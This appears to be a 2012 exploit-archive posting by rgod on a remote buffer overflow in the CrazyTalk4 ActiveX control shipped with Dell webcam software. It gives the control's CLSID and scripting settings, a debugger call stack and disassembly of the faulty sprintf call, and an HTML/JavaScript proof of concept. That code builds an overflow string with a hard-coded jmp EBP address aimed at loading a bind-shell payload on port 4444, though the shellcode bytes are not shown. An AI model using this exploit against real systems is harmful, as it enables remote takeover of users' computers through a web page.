Dell Webcam Software Bundled – ActiveX Remote Buffer Overflow

  • 作者: rgod
    日期: 2012-03-19
  • 类别:
  • 来源:
  • Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll 
    sprintf Remote Buffer Overflow Vulnerability
    Tested against: Microsoft Windows Vista SP2
    Microsoft Windows XP SP3
    Microsoft Windows 2003 R2 SP2
    Internet Explorer 7/8/9
    download url of a test version:
    file tested: Dell_SX2210-Monitor_Webcam SW RC1.1_ R230103.exe
    This package contains the Dell Webcam Central software
    developed by Creative Technologies for Dell.
    I think this is a very common ActiveX, probably bundled with Dell Notebooks.
    The mentioned software carries a third party ActiveX Control
    with the following settings.
    Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx
    ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1
    CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED}
    Safe for Scripting (Registry): True
    Safe for Initialization (Registry): True
    This control is marked safe for scripting and safe for initialization,
    then Internet Explorer will allow scripting of this control from remote.
    The 'BackImage' ,'ScriptName', 'ModelName' and 'SRC' properties
    can be used to trigger a buffer overflow condition.
    The crazytalk4.ocx ActiveX control will load the close CrazyTalk4Native.dll
    library and, while constructing a local file path, will call sprintf()
    with an insufficient size.
    Call stack of main thread
    AddressStackProcedure / arguments Called from Frame
    0012EE24 023D4FAB msvcrt.sprintfCrazyTal.023D4FA5
    0012EE28 0012F180 s = 0012F180
    0012EE2C 023F431C format = "%s%s%s"
    0012EE30 042A2D6C <%s> = "C:\DOCUME~1\Admin\LOCALS~1\Temp\RLTMP\~RW463\"
    0012EE34 0012EF5C <%s> = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    0012EE38 0012EE58 <%s> = ""
    0012F164 023D601D CrazyTal.023D4F20 
    code, CrazyTalk4Native.dll :
    023D4F80 85C0 test eax,eax
    023D4F82 74 38je short CrazyTal.023D4FBC
    023D4F84 8B9C24 2C030000mov ebx,dword ptr ss:[esp+32C]
    023D4F8B 8D4424 1Clea eax,dword ptr ss:[esp+1C]
    023D4F8F 8D8C24 20010000lea ecx,dword ptr ss:[esp+120]
    023D4F96 50 push eax
    023D4F97 81C6 443B0000add esi,3B44
    023D4F9D 51 push ecx
    023D4F9E 56 push esi
    023D4F9F 68 1C433F02push CrazyTal.023F431C ; ASCII "%s%s%s"
    023D4FA4 53 push ebx
    023D4FA5 FF15 E4F33E02call dword ptr ds:[<&MSVCRT.sprintf>]; msvcrt.sprintf
    As attachment, proof of concept code which overwrites EIP and SEH.
    0:008> lm -vm CrazyTalk4Native
    startendmodule name
    021c0000 0220b000 CrazyTalk4Native (deferred) 
    Image path: C:\PROGRA~1\COMMON~1\REALLU~1\CTPLAY~1\CrazyTalk4Native.dll
    Image name: CrazyTalk4Native.dll
    Timestamp:Thu May 17 12:13:42 2007 (464C2AD6)
    CheckSum: 00048AB2
    File version: 4.5.815.1
    Product version:
    File flags: 0 (Mask 3F)
    File OS:4 Unknown Win32
    File type:2.0 Dll
    File date:00000000.00000000
    Translations: 0409.04b0
    ProductName:CrazyTalk4 ActiveX Control Module
    InternalName: CrazyTalk4
    OriginalFilename: CrazyTalk4.OCX
    ProductVersion: 4, 0, 0, 1
    FileVersion:4, 5, 815, 1
    PrivateBuild: 4, 5, 815, 1
    SpecialBuild: 4, 5, 815, 1
    FileDescription:CrazyTalk4 Native Control Module
    LegalCopyright: Copyright (C) 2005
    LegalTrademarks:Copyright (C) 2005
    Comments: Copyright (C) 2005
    Dell Camera Software ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Exploit
    bind shell, IE-NO-DEP
    Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx
    ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1
    CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED}
    Safe for Scripting (Registry): True
    Safe for Initialization (Registry): True
    <!-- saved from url=(0014)about :internet -->
    <object classid='clsid:13149882-F480-4F6B-8C6A-0764F75B99ED' id='obj' width=100; height=100; />
    //bad chars:
    var x=""; 
    for (i=0; i<216; i++){x = x + "A";}
    x = x + "\x50\x24\x40\x77";//0x77402450jmp EBP, user32.dll - change for your need
    for (i=0; i<140; i++){x = x + "A";}
    // windows/shell_bind_tcp - 696 bytes
    // Encoder: x86/alpha_mixed
    // EXITFUNC=seh, LPORT=4444, RHOST=
    obj.BackImage = x;